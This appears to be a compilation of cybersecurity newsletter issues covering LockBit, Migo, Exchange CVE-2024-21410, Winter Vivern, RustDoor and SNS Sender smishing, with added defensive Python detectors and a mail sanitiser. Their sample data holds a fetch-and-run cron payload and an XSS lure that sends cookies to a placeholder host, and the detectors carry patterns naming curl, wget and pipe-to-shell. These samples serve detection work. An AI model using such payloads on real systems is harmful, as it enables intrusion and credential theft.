UK Leads Operation Against Ransomware Giant



Welcome to Gone Phishing, your daily cybersecurity newsletter that wants to honour those on the frontlines of the cyberwar who are forever patching and updating. They've taken a leaf out of the UK's nuclear programme: if at first you don't succeed, Tri, Tri, again.

Today's hottest cybersecurity news stories:

  • Rule Britannia! The UK's answer to the FBI (the NCA) throws a spanner in LockBit's works

  • Mine how you go! Migo malware targets Redis servers for crypto mining

  • More than 28,500 Exchange servers vulnerable to actively exploited bug

UK: We won't rest until we have them under LockBit and key

Major Blow to Cybercrime: UK Leads Operation Against Ransomware Giant

The UK has spearheaded an operation targeting LockBit, believed to be the world's largest criminal ransomware group. Led by the National Crime Agency (NCA), the operation marks a significant disruption to the cybercriminal landscape.

LockBit, suspected to operate out of Russia, is notorious for its ransomware-as-a-service model, renting its tooling and infrastructure to other criminal entities. The NCA infiltrated LockBit's systems, seized crucial data and took control of the group's infrastructure.

Law enforcement agencies from around the world, including the FBI and Europol, joined the operation. This coordinated effort signals a new phase in combating ransomware, with the UK taking a leading role.

LockBit's modus operandi involves breaking into the systems of companies and organisations, encrypting data and demanding ransom payments. The group's victims include high-profile entities such as Royal Mail, the Industrial & Commercial Bank of China (ICBC) and suppliers to the NHS.

The operation, which had been underway covertly, culminated in a public phase in which law enforcement agencies took control of LockBit's dark web leak site. Instead of the usual content, visitors were greeted with messages indicating law enforcement control and international collaboration.

The disruption not only impacts LockBit's operations but also exposes the inner workings of the group. Law enforcement agencies obtained critical data, shedding light on the true scale of LockBit's activities.

LockBit operates by providing criminal services to affiliates, offering hacking tools and guidance. Following the operation, affiliates attempting to log in to LockBit's site were met with warnings that their details were now in the hands of law enforcement.

The operation aims not only to disrupt LockBit's activities but also to undermine its credibility and reputation. By exposing the group's operations and targeting its affiliates, law enforcement hopes to deter future criminal collaboration.

While LockBit's core operators remain beyond the reach of law enforcement, the operation represents a significant step forward in combating cyber threats. The collaborative effort sends a clear message: cybercrime will not go unchecked.

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Hackers be like hola, aMigo

New Cryptojacking Campaign Targets Redis Servers

A fresh malware campaign has surfaced, taking aim at Redis servers to kickstart cryptocurrency mining on compromised Linux systems.

Dubbed Migo, this Golang ELF binary ships with compile-time obfuscation and persistence capabilities, making it a formidable threat to Linux hosts.

Cado Security researcher Matt Muir shed light on the campaign, highlighting the attackers' use of novel tactics to weaken system defences before exploiting the exposed Redis instance.

The attack begins with a series of CONFIG SET commands that switch off Redis configuration options which would otherwise get in the way (protected-mode among them), paving the way for subsequent exploitation without raising suspicion.

Once inside, the threat actors set Redis keys to establish persistence and fetch the primary payload from Transfer.sh, a file transfer service. This technique, previously spotted in early 2023, remains a favoured one among cryptojackers.

Migo, the core malware, then springs into action, downloading an XMRig installer from GitHub and carrying out steps to maintain persistence, terminate rival miners and launch the cryptocurrency mining operation.

To evade detection, Migo disables SELinux, hides its processes and removes monitoring agents. These tactics bear a resemblance to those employed by established cryptojacking groups such as TeamTNT and Rocke.

Migo's recursive scanning of system files under /etc presents a puzzle for analysts: it may be aimed at confusing sandbox environments, or at tailoring the attack to specific targets.

In essence, Migo underscores the evolving sophistication of cloud-focused attackers, highlighting the need for robust security measures to protect web-facing services such as Redis, which should never be exposed to the internet without authentication.
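The configuration-weakening and key-planting steps described above are exactly what a Redis MONITOR stream or a proxy log makes visible. The following added example, written for this page and not code from Cado Security or from the Migo campaign, parses constructed redis-cli MONITOR output and flags the sequence: CONFIG SET calls that switch off protections, dir/dbfilename redirection, stored values that look like cron jobs or shell one-liners, and REPLICAOF pointing at an attacker host. The client addresses, command values and the specific options toggled beyond protected-mode are assumptions, not captured data.

```python
import re
import shlex
from collections import defaultdict

# Constructed `redis-cli MONITOR` output (not a capture from the Migo campaign):
# one ordinary client plus one client walking through the weaken -> plant -> save
# sequence described above. The exact options toggled are an assumption.
SAMPLE_MONITOR = """\
1708000000.100000 [0 10.0.0.8:50210] "GET" "session:abc"
1708000001.200000 [0 203.0.113.7:41234] "CONFIG" "SET" "protected-mode" "no"
1708000001.300000 [0 203.0.113.7:41234] "CONFIG" "SET" "replica-read-only" "no"
1708000002.400000 [0 203.0.113.7:41234] "SET" "backup1" "\\n\\n*/1 * * * * root curl -s http://transfer.sh/get/x | sh\\n\\n"
1708000003.500000 [0 203.0.113.7:41234] "CONFIG" "SET" "dir" "/etc/cron.d"
1708000003.600000 [0 203.0.113.7:41234] "CONFIG" "SET" "dbfilename" "root"
1708000004.700000 [0 203.0.113.7:41234] "SAVE"
1708000005.800000 [0 10.0.0.8:50210] "INCR" "counter"
"""

MONITOR_LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.+)$')

# Settings whose "weak" value removes a protection an attacker wants gone.
WEAKENING = {"protected-mode": "no", "replica-read-only": "no"}
# Redirecting the dump file is the classic way to turn SAVE into "write any file".
WRITE_REDIRECT = {"dir", "dbfilename"}
# Crude marks of a payload smuggled into a value: cron schedule, downloader, pipe to shell.
PAYLOAD_HINTS = re.compile(r"\*/\d+ \* \* \* \*|curl |wget |\| *sh\b|/bin/(ba)?sh|transfer\.sh", re.I)


def parse_monitor_line(line):
    """Split one MONITOR line into timestamp, client address and argv.
    MONITOR quotes every argument, so shlex recovers them faithfully."""
    m = MONITOR_LINE.match(line)
    if not m:
        return None
    return {"ts": float(m.group("ts")), "client": m.group("client"),
            "args": shlex.split(m.group("rest"))}


def analyse_monitor(text):
    """Return (client, rule, detail) triples for every suspicious command."""
    findings = []
    for line in text.splitlines():
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        a = ev["args"]
        cmd = a[0].upper()
        if cmd == "CONFIG" and len(a) >= 4 and a[1].upper() == "SET":
            key, val = a[2].lower(), a[3]
            if WEAKENING.get(key) == val.lower():
                findings.append((ev["client"], "config-weakened", f"{key}={val}"))
            elif key in WRITE_REDIRECT:
                findings.append((ev["client"], "write-redirect", f"{key}={val}"))
        elif cmd in ("SET", "SETEX", "SETNX", "APPEND") and len(a) >= 3 and PAYLOAD_HINTS.search(a[-1]):
            findings.append((ev["client"], "payload-in-value", a[1]))
        elif cmd in ("SLAVEOF", "REPLICAOF") and len(a) >= 3 and a[1].upper() != "NO":
            findings.append((ev["client"], "replica-hijack", f"{a[1]}:{a[2]}"))
    return findings


def suspicious_clients(findings):
    """Collapse findings per client. A client that weakens config, or that both
    redirects the dump path and stores a payload-looking value, is the one to
    block and investigate; a lone write-redirect may just be an admin."""
    rules = defaultdict(set)
    for client, rule, _ in findings:
        rules[client].add(rule)
    return {c: sorted(r) for c, r in rules.items()
            if "config-weakened" in r or {"write-redirect", "payload-in-value"} <= r}
```

Pair the detection with hardening in redis.conf: bind the listener to an internal address, keep `protected-mode yes`, set `requirepass`, and use `rename-command CONFIG ""` so that CONFIG SET is simply not available to a network client.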

Catch of the Day!!

The Motley Fool: "Fool me once, shame on... shame on you. Fool me... you can't get fooled again." Good ol' George Dubya. Let us tell you who's not fooling around though; that's the Crüe at Motley Fool. You'd be a fool (alright, enough already!) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! Kidding aside, if you check out their website they've actually got a ton of great content with a wide variety of different investment ideas to suit most budgets. (LINK)

Wander: Find your happy place. Cue Happy Gilmore flashback. Mmmm Happy Place... So, we've noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, it's easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels set Wander apart from your run-of-the-mill American getaway. (LINK)

DigitalOcean: If you build it they will come. Nope, we're not talking about a baseball field for ghosts (great movie, to be fair). This is DigitalOcean, who've got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website you'll find yourself catching the buzz even if you can't code (guilty). But if you can and you're looking for somewhere to test things out or launch something new or simply enhance what you've got, we'd recommend checking out their services fo' sho. And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! (LINK)

This is really bugging us. It's a bug in the wild.

Critical Vulnerability in Microsoft Exchange Servers

A critical-severity privilege escalation flaw, CVE-2024-21410, poses a significant threat to as many as 97,000 Microsoft Exchange servers worldwide.

Initially exploited as a zero-day, this vulnerability lets a remote, unauthenticated attacker relay a user's leaked NTLM credentials (captured, for example, from an NTLM client such as Outlook) against a vulnerable Exchange server and authenticate as that user, gaining that user's privileges on the server.

Although Microsoft released a patch on February 13 to address the issue, a substantial number of servers remain vulnerable, with approximately 28,500 confirmed cases.

Shadowserver's threat monitoring service identified Germany, the United States and the United Kingdom as the most affected countries, emphasising the global reach of the problem.

While there is currently no publicly available exploit for CVE-2024-21410, the consequences of exploitation underscore the urgency for administrators to apply the update and mitigations.

To safeguard against this threat, organisations are advised to deploy Exchange Server 2019 Cumulative Update 14 (CU14), which turns on NTLM credential relay protection (Extended Protection for Authentication) by default. Servers that cannot take CU14 yet should have Extended Protection enabled manually.

Furthermore, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added CVE-2024-21410 to its Known Exploited Vulnerabilities catalogue, requiring federal agencies to remediate by March 7, 2024.

Failure to address this vulnerability could result in severe consequences, including unauthorised access to confidential mailbox data and a foothold for further network exploitation.

In summary, swift action is essential to mitigate the risk posed by CVE-2024-21410 and protect organisations from exploitation.
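A first step on the defender side is knowing which servers still sit below the CU14 build and which older ones have Extended Protection switched on. The following added example, not Microsoft's or the original article's code, takes an inventory of (server, AdminDisplayVersion, extended-protection-enabled) rows, as produced by `Get-ExchangeServer | Format-List Name,AdminDisplayVersion` plus your own Extended Protection check, and classifies each one. The CU14 build number 15.2.1544.4 and the inventory rows are assumptions to verify against Microsoft's Exchange build number table.

```python
import re

# Assumed build floor, to verify against Microsoft's Exchange build number table:
# Exchange Server 2019 CU14 (13 Feb 2024), the first CU that enables Extended
# Protection for Authentication by default, is build 15.2.1544.4.
EXCHANGE_2019_CU14 = (15, 2, 1544, 4)

# Constructed inventory: (server, AdminDisplayVersion, extended_protection_enabled).
# The EP flag must come from your own check; None means "not checked".
SAMPLE_INVENTORY = [
    ("EX01", "Version 15.2 (Build 1544.4)", None),
    ("EX02", "Version 15.2 (Build 1258.12)", False),
    ("EX03", "Version 15.1 (Build 2507.35)", True),
    ("EX04", "Version 15.0 (Build 1497.48)", False),
]


def parse_build(version):
    """'Version 15.2 (Build 1544.4)' or '15.2.1544.4' -> (15, 2, 1544, 4)."""
    nums = tuple(int(n) for n in re.findall(r"\d+", version))
    if len(nums) != 4:
        raise ValueError(f"unrecognised Exchange version string: {version!r}")
    return nums


def assess(server, version, extended_protection_enabled=None):
    """Classify one server's CVE-2024-21410 exposure as
    patched / mitigated / vulnerable / unsupported."""
    build = parse_build(version)
    if build[:2] == (15, 2):                       # Exchange 2019
        if build >= EXCHANGE_2019_CU14:
            return (server, "patched", "CU14 or later: Extended Protection on by default")
        if extended_protection_enabled:
            return (server, "mitigated", "pre-CU14 but Extended Protection enabled")
        return (server, "vulnerable", "install CU14, or enable Extended Protection now")
    if build[:2] == (15, 1):                       # Exchange 2016 (assumption: no 2016 CU ships the fix)
        if extended_protection_enabled:
            return (server, "mitigated", "Exchange 2016 with Extended Protection enabled")
        return (server, "vulnerable", "enable Extended Protection by hand")
    return (server, "unsupported", "out-of-support Exchange build; migrate")


def triage(inventory):
    """Assess every row; unparsable versions are reported rather than skipped."""
    results = []
    for server, version, ep in inventory:
        try:
            results.append(assess(server, version, ep))
        except ValueError as err:
            results.append((server, "unknown", str(err)))
    return results
```

Microsoft's ExchangeExtendedProtectionManagement.ps1 script both enables Extended Protection and reports its current state, which is where the third column of the inventory should come from rather than from guesswork.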

It's a jungle out there, folks!

Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI; with all the new AI things coming to market it's good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20-year veteran 'Wealthy Primate' might be able to help you climb that tree with his stick and banana approach.

  • Techspresso: Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, TechCrunch etc).

Let us know what you think!

So long and thanks for reading all the phish!

80+ organisations targeted by Russian hackers


Welcome to Gone Phishing, your daily cybersecurity newsletter that's forever fishing for phishing.

Today's hottest cybersecurity news stories:

  • 80+ organisations targeted by Russian hackers Winter Vivern

  • Google fights fire with fire with new AI-fuelled cybersecurity initiative

  • Meta warning! 8 spyware firms target iOS, Android and Windows

We have reached the Winter of our discontent

Winter Vivern Cyber Espionage Campaign Unveiled

A new cyber espionage campaign, likely run by threat actors with ties to Belarus and Russia, has come to light, targeting over 80 organisations, primarily in Georgia, Poland and Ukraine. The operation exploited cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers, according to findings by Recorded Future.

The intrusion set has been attributed to Winter Vivern, also known as TA473 and UAC0114, and is tracked by Recorded Future as Threat Activity Group 70 (TAG-70). The group's exploitation of flaws in Roundcube mirrors tactics previously observed in Russia-linked groups such as APT28, APT29 and Sandworm, which have a history of targeting email platforms.

Winter Vivern's activities, traced back to at least December 2020, include leveraging a since-patched vulnerability in Zimbra Collaboration email software last year to infiltrate organisations in Moldova and Tunisia. The recent campaign, spanning early to mid-October 2023 and aimed at gathering intelligence on European political and military affairs, followed additional TAG-70 activity against Uzbekistan government mail servers detected in March 2023.

Recorded Future noted the sophisticated nature of TAG-70's methods, which combine social engineering with XSS vulnerabilities in Roundcube to breach targeted mail servers, effectively bypassing the defences of government and military organisations. The attack chains deliver JavaScript payloads through the Roundcube flaws; once a victim opens the malicious email in the webmail client, the script runs in the victim's browser session and exfiltrates user credentials to a command-and-control (C2) server.

Furthermore, evidence points to TAG-70 targeting Iranian embassies in Russia and the Netherlands, along with the Georgian Embassy in Sweden, indicating a broader geopolitical interest in assessing Iran's diplomatic activities, particularly concerning its support for Russia in Ukraine, and in monitoring Georgia's pursuit of European Union (EU) and NATO accession.

This revelation underscores the persistent and evolving threat landscape of cyber espionage, emphasising the necessity for robust cybersecurity measures (timely patching of webmail software first among them) and international cooperation to counter such operations.
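The payload class at work here is a script that runs inside the victim's webmail session when a crafted message is rendered. The following added example, written for this page and not code from Recorded Future or from the Roundcube project, is a small HTML-email sanitiser of the kind a mail gateway or webmail front end applies before rendering: it drops script-bearing elements such as svg and object, strips on* event handlers and javascript:/data: URLs, and keeps an audit trail of what it removed so a hit can be alerted on. The lure message is constructed; it is not a Winter Vivern sample.

```python
import re
from html import escape
from html.parser import HTMLParser

# Elements that can carry script or external content and have no business in a mail body.
DROP_TAGS = {"script", "svg", "math", "object", "embed", "iframe", "frame", "frameset",
             "form", "meta", "base", "link", "style", "template"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "background", "poster"}
VOID_TAGS = {"br", "img", "hr", "input", "area", "col", "wbr", "meta", "link", "base"}
SAFE_SCHEME = re.compile(r"^(https?|mailto|cid):", re.I)

# Constructed lure: a plausible body with an SVG onload beacon, a javascript: link and an
# onerror handler on an inline image. Not a sample from the campaign.
LURE = ('<p>Please review the attached <b>invoice</b>.</p>'
        '<svg onload="fetch(\'https://203.0.113.9/c?\'+document.cookie)"></svg>'
        '<a href="javascript:alert(document.cookie)">open</a>'
        '<img src="cid:logo1" onerror="alert(1)">'
        '<a href="https://example.org/x">ok</a>')


class MailHtmlSanitizer(HTMLParser):
    """Rebuild the HTML, keeping only tags and attributes that cannot execute script."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside a dropped element
        self.dropped = []     # audit trail of what was removed

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag not in VOID_TAGS:
                self.skip_depth += 1
            return
        if tag in DROP_TAGS:
            self.dropped.append(f"tag:{tag}")
            if tag not in VOID_TAGS:
                self.skip_depth = 1
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = value or ""
            if name.startswith("on"):                       # onload, onerror, onclick ...
                self.dropped.append(f"attr:{name}")
                continue
            if name in URL_ATTRS:
                # Strip whitespace/control chars so "java\nscript:" cannot sneak past the scheme check.
                v = re.sub(r"[\s\x00-\x1f]", "", value)
                if ":" in v and not SAFE_SCHEME.match(v):   # javascript:, data:, vbscript: ...
                    self.dropped.append(f"url:{name}={value[:40]}")
                    continue
            if name == "style" and re.search(r"expression|url\s*\(|javascript", value, re.I):
                self.dropped.append("attr:style")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag not in VOID_TAGS:
                self.skip_depth -= 1
            return
        if tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments (including IE conditional comments) are dropped outright


def sanitize_mail_html(html):
    """Return (clean_html, dropped_items)."""
    p = MailHtmlSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out), p.dropped
```

An allow-list of this shape is the right default for mail: anything the sanitiser does not recognise is dropped, and a non-empty `dropped` list on an inbound message aimed at a government mailbox is itself worth a detection rule. The sanitiser is a defence in depth, not a substitute for patching the webmail software.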


Google: I can be your umbrella, ella, ella AI, AI, AI

Google Spearheads AI Cyber Defense Initiative

Google has launched an initiative to advance the use of artificial intelligence (AI) in cybersecurity, arguing that AI can tip the long-standing balance in favour of defenders over attackers.

Believing that AI offers a significant advantage in threat detection, malware analysis, vulnerability detection and fixing, and incident response, Google's AI Cyber Defense Initiative aims to democratise AI in security. The initiative encompasses investment in AI-ready infrastructure, development of defensive tools and research, and provision of AI security training.

Google emphasises the need for collaboration between public and private entities to secure AI from its foundations, empower defenders and foster research cooperation. To this end, Google is expanding its AI for Cybersecurity Program, selecting 17 startups from the UK, US and EU, and enhancing its Cybersecurity Seminars Program to train cybersecurity experts in underserved communities across Europe.

Moreover, Google has open-sourced Magika, an AI-driven file-type identification tool that helps spot malicious content, which is used in Google Drive, Gmail and Safe Browsing and is available through VirusTotal. To drive advances in AI-powered security, Google is offering $2 million in research grants and forging partnerships with institutions including The University of Chicago, Carnegie Mellon and Stanford.

Google envisions the AI revolution as a catalyst for addressing long-standing security challenges, paving the way for a safe, secure and trusted digital landscape. As AI continues to evolve, Google aims to leverage its expertise and resources to realise the full potential of AI in safeguarding digital ecosystems.


No Meta what your phone is, No Meta what you do

Meta Exposes International Spyware Network

Meta Platforms has uncovered and taken action against a network of eight companies operating in Italy, Spain and the United Arab Emirates (U.A.E.) involved in the surveillance-for-hire industry, as revealed in its Adversarial Threat Report for the fourth quarter of 2023.

These firms, namely Cy4Gate/ELT Group, RCS Labs, IPS Intelligence, Variston IT, TrueL IT, Protect Electronic Systems, Negg Group and Mollitiam Industries, targeted iOS, Android and Windows devices with malware capable of collecting extensive data, including device information, location, media, contacts, emails, social media interactions and more.

They also abused popular platforms like Facebook, Instagram and X (formerly Twitter) through scraping, social engineering and phishing.

For instance, fictitious personas associated with RCS Labs tricked users into providing personal details, while Variston IT used Facebook and Instagram accounts for exploit development and testing.

Meta identified accounts used by Negg Group for spyware testing and traced Mollitiam Industries' activity to the scraping of public information.

In addition to tackling the spyware network, Meta removed over 2,000 accounts, Pages and Groups from Facebook and Instagram originating from China, Myanmar and Ukraine for coordinated inauthentic behaviour (CIB). Notably, the Chinese cluster targeted U.S. audiences with content critical of U.S. foreign policy, while the network from Myanmar disseminated pro-military propaganda. The Ukrainian cluster supported specific politicians while criticising opposition figures in Kazakhstan.

Amid these actions, Meta introduced new security hardening such as Control Flow Integrity (CFI) on Messenger for Android and VoIP memory isolation for WhatsApp to raise the cost of exploitation. Nonetheless, the surveillance industry persists, with new tools like Patternz, which leverages real-time bidding (RTB) advertising data, and revelations about MMS Fingerprint, a mobile network technique allegedly used by NSO Group.

The exposure of these activities underscores the ongoing battle against sophisticated cyber threats, prompting concerted efforts from tech companies and governments to safeguard digital ecosystems and protect user privacy and security.


RustDoor targets crypto firms w/ fake jobs


Welcome to Gone Phishing, your daily cybersecurity newsletter that wonders whether banning phones at school in the UK will be the source of many a hacking villain origin story.

Today's hottest cybersecurity news stories:

  • Mac users beware! RustDoor targets crypto firms with fake jobs

  • Amazon Web Services abused for bulk smishing attacks via SNS

  • FBI most wanted hacker behind Zeus, IcedID malware pleads guilty

Hackers: Don't call us. We'll call you

Cryptocurrency Sector Targeted by RustDoor macOS Malware

A wave of attacks has hit multiple companies in the cryptocurrency industry, with a newly discovered macOS backdoor named RustDoor at the centre of the storm.

Unveiled by Bitdefender, RustDoor is Rust-based malware capable of stealing and uploading files and harvesting machine information. It disguises itself as a Visual Studio update to slip onto systems.

The attack unfolds with first-stage downloaders masquerading as job offer PDFs. These lures are in fact scripts: once opened, they fetch and execute the malware while presenting a decoy PDF to mask the malicious activity.

Bitdefender's investigation uncovered additional layers of the attack chain, revealing ZIP archives housing shell scripts responsible for fetching RustDoor from a designated website. Meanwhile, Golang-based binaries communicate with a command-and-control domain, exfiltrating detailed system information and victim data.

Interestingly, the attack targets senior engineering staff, with victims predominantly located in Hong Kong and Lagos, Nigeria. This focus suggests a deliberate campaign aimed at high-value targets.

The rise of such threats coincides with revelations from South Korea's National Intelligence Service implicating a North Korean-affiliated IT organisation in a malware-as-a-service operation.

This underscores the global nature of cyber threats and the importance of robust cybersecurity measures.


It's your classic smish and grab attack

SNS Sender: The AWS-Abusing Smishing Tool

A dangerous trend has emerged with the rise of a malicious Python script dubbed SNS Sender, which abuses Amazon Web Services (AWS) Simple Notification Service (SNS) to orchestrate bulk smishing attacks.

Attributed to a threat actor going by ARDUINO_DAS, this tool lets criminals dispatch SMS phishing messages, often posing as notices from the United States Postal Service (USPS) about missed package deliveries. These deceptive texts carry malicious links aimed at harvesting victims' personally identifiable information (PII) and payment card details.

What sets SNS Sender apart is its use of AWS SNS for SMS spamming, the first such tool observed in the wild. The tool requires a set of inputs: a list of phishing links, AWS access keys, target phone numbers, sender IDs and message content. Notably, support for sender IDs varies by country, suggesting the tool originates from a region where sender IDs are customary. The AWS access keys are the crucial ingredient: the tool does nothing without a compromised account that is allowed to publish SMS messages.

Evidence suggests the operation has been active since at least July 2022, as indicated by bank logs referencing ARDUINO_DAS shared on carding forums. The phishing kits associated with this campaign predominantly impersonate USPS, directing victims to counterfeit package tracking pages that solicit personal and financial information.

Moreover, the emergence of SNS Sender reflects the persistent efforts of commodity threat actors to exploit cloud environments for their campaigns. Past incidents have highlighted similar abuse of stolen AWS access keys to run SMS campaigns through SNS.

In a broader context, the cybersecurity landscape continues to witness innovation in tactics employed by threat actors. Recent examples include the use of advertising networks and legitimate platforms like Discord to distribute malware, underscoring the need for robust defences and heightened vigilance.
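The defensive angle the story leaves implicit: the tool is only as good as the stolen access key, so the signal to hunt for is an access key that suddenly starts publishing SMS to many phone numbers. The following added example, written for this page and not code from the tool's author or from AWS, runs that check over constructed CloudTrail-style records. It assumes CloudTrail data events for SNS Publish are switched on and that the record's requestParameters carries phoneNumber for direct-to-phone sends (confirm the field names in your own trail); the keys, IPs and phone numbers are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta

SMS_BURST_THRESHOLD = 20                 # distinct destination numbers ...
SMS_BURST_WINDOW = timedelta(minutes=5)  # ... within this window
APPROVED_SMS_KEYS = set()                # access keys allowed to send direct-to-phone SMS


def _rec(ts, key, name, params, ip="198.51.100.23"):
    """Build a minimal CloudTrail-style record (constructed, not a real capture).
    The requestParameters key names for SNS data events are an assumption."""
    return {"eventTime": ts, "eventSource": "sns.amazonaws.com", "eventName": name,
            "sourceIPAddress": ip,
            "userIdentity": {"type": "IAMUser", "accessKeyId": key, "userName": "ci-deploy"},
            "requestParameters": params}


# A leaked key sets a USPS-looking sender ID, then blasts 30 numbers in 30 seconds;
# a second key publishes to a topic, as an application normally would.
SAMPLE_CLOUDTRAIL = (
    [_rec("2024-02-15T10:00:01Z", "AKIAEXAMPLELEAKED", "SetSMSAttributes",
          {"attributes": {"DefaultSenderID": "USPS"}})]
    + [_rec(f"2024-02-15T10:00:{sec:02d}Z", "AKIAEXAMPLELEAKED", "Publish",
            {"phoneNumber": f"+1202555{sec:04d}",
             "message": "USPS: your package could not be delivered. Update: http://usps-redelivery.example/"})
       for sec in range(2, 32)]
    + [_rec("2024-02-15T10:05:00Z", "AKIAEXAMPLEAPP", "Publish",
            {"topicArn": "arn:aws:sns:us-east-1:123456789012:order-events", "message": "{}"},
            ip="10.0.4.12")]
)


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_sms_abuse(records):
    """Return alerts for sender-ID changes by unapproved keys and for bursts of
    direct-to-phone publishes from one key."""
    alerts = []
    sends = defaultdict(list)
    for r in records:
        if r.get("eventSource") != "sns.amazonaws.com":
            continue
        key = r["userIdentity"].get("accessKeyId", "?")
        params = r.get("requestParameters") or {}
        if r["eventName"] == "SetSMSAttributes":
            sender = (params.get("attributes") or {}).get("DefaultSenderID")
            if sender and key not in APPROVED_SMS_KEYS:
                alerts.append({"key": key, "rule": "sender-id-set", "detail": sender,
                               "ip": r["sourceIPAddress"]})
        elif r["eventName"] == "Publish" and "phoneNumber" in params:
            sends[key].append((parse_time(r["eventTime"]), params["phoneNumber"],
                               r["sourceIPAddress"]))
    for key, events in sends.items():
        if key in APPROVED_SMS_KEYS:
            continue
        events.sort()
        start = 0
        for end in range(len(events)):          # sliding window over time-ordered sends
            while events[end][0] - events[start][0] > SMS_BURST_WINDOW:
                start += 1
            numbers = {n for _, n, _ in events[start:end + 1]}
            if len(numbers) >= SMS_BURST_THRESHOLD:
                alerts.append({"key": key, "rule": "sms-burst", "ip": events[end][2],
                               "detail": f"{len(numbers)} numbers within {SMS_BURST_WINDOW}"})
                break
    return alerts
```

On the prevention side, scope `sns:Publish` in IAM policies to named topic ARNs (a direct-to-phone publish carries no topic ARN and is denied by such a policy), set the account's SMS monthly spend limit low, and rotate any key that trips the burst rule rather than merely disabling it.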


Oh how the mighty have fallen. Better put that banking trojan on Ice, bro

Ukrainian Cybercriminal's Guilty Plea: Zeus and IcedID Schemes

Vyacheslav Igorevich Penchukov, also known as Vyacheslav Igoravich Andreev, 37, has pleaded guilty to leading roles in two significant malware operations, Zeus and IcedID, spanning more than a decade from May 2009 to February 2021.

Penchukov was arrested by Swiss authorities in October 2022 and extradited to the U.S. last year, culminating in his recent guilty plea.

He had been on the FBI's most-wanted list since 2012. The U.S. Department of Justice (DoJ) described him as a leader of the two malware groups, which infected countless computers worldwide and caused substantial financial losses and ransomware incidents.

The Zeus banking trojan harvested bank account details, passwords and other information needed to access online banking. Penchukov and his associates, operating as the Jabber Zeus gang, impersonated victims' employees to initiate unauthorised fund transfers, routing the stolen money through a network of "money mules" before funnelling it to offshore accounts.

Penchukov's involvement extended to the IcedID malware scheme, starting in November 2018. IcedID, also known as BokBot, functions as an information stealer and payload loader, facilitating further attacks including ransomware. Despite evading Ukrainian prosecution for years, reportedly thanks to political connections, Penchukov's extradition and admission of guilt to racketeering and wire fraud conspiracy charges mark a significant win for cybercrime prosecutors.

Meanwhile, the DoJ announced the extradition of Mark Sokolovsky, a 28-year-old Ukrainian national, from the Netherlands. Sokolovsky faces charges related to operating and advertising Raccoon, an infostealer sold on a malware-as-a-service model. Raccoon, available since April 2019, was distributed through email phishing schemes to steal personal data, including login credentials and financial information, from millions of users worldwide.

These cases underscore the global effort to combat cybercrime, highlighting the ongoing battle against cybercriminals' sophisticated tactics and the importance of international cooperation in apprehending and prosecuting offenders.

Keep up the good work, lads. The police, not the hackers! Unit next time, folks.


Deepfakes employed by Chinese hackers in mobile banking attacks


Welcome to Gone Phishing, your daily cybersecurity newsletter that's got that fry-day feeling. So, let's get cooking!

It's Friday, folks, which can only mean one thing... It's time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the Week. Okay, that's it.

Congrats, the cybercriminals are no match... for your patch!

Check out these freshly hatched patches.

Happy Shrove Patch Tuesday

Microsoft's February Patch Tuesday Update: 73 Flaws Fixed!

Microsoft's latest Patch Tuesday has rolled out, addressing 73 security vulnerabilities across its software lineup, including 2 zero-days already being exploited in the wild. Of the 73, 5 are rated critical, 65 important and 3 moderate. Separately, 24 fixes have landed in the Chromium-based Edge browser since January's release.

Key Vulnerabilities

  • CVE-2024-21351: Windows SmartScreen Security Feature Bypass (CVSS: 7.6)

  • CVE-2024-21412: Internet Shortcut Files Security Feature Bypass (CVSS: 8.1)

Both are bypasses rather than memory-corruption bugs: CVE-2024-21351 lets an attacker inject code into SmartScreen and potentially execute it, while CVE-2024-21412 lets a specially crafted Internet Shortcut (.url) file sidestep the warnings SmartScreen would normally show. Each needs the victim to open a malicious file, so the usual advice applies: don't open unexpected attachments or downloads. CVE-2024-21351 is the second SmartScreen bypass in a few months, following CVE-2023-36025, which has since been exploited by multiple hacking groups. Trend Micro links CVE-2024-21412 to Water Hydra's attacks on financial-market traders.

Critical Flaws Patched

  • Windows Hyper-V DoS

  • Windows PGM Remote Code Execution

  • Microsoft Dynamics NAV Info Disclosure

  • Microsoft Exchange Server Privilege Escalation

  • Microsoft Outlook Code Execution

Better luck next time! Exchange Server exploited the day after the patch...

Critical Exchange Server Flaw Exploited in the Wild!

Microsoft has confirmed active exploitation of a critical security flaw in Exchange Server, tracked as CVE-2024-21410 (CVSS: 9.8), just a day after releasing patches as part of its Patch Tuesday updates. The flaw is a privilege-escalation bug, and a successful attack lets the attacker act on the Exchange server as the victim user.

Key Details

